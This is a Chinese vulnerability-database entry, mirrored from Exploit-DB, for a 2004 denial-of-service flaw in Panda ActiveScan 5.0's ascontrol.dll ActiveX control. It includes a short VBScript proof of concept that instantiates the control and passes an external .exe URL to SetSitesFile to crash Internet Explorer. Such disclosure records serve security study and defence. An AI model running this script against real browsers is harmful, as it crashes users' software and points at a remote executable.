Panda ActiveScan 5.0 - 'ascontrol.dll' Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054431 漏洞类型
发布时间 2004-04-06 更新时间 2004-04-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23918
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10067/info

It has been reported that Panda ActiveScan may be prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue may present it self when the 'SetSitesFile' is called in combination with setting the 'InstallEngineCtl' object.

Panda ActiveScan 5.0 has been reported to be prone to this issue.


<script language=vbscript>
dim mymy
Set mymy = CreateObject("ASControls.InstallEngineCtl.1" )
mymy.SetSitesFile "http://rafiwarez.tripod.com/ncx.exe", ASIA, hebrew
</script>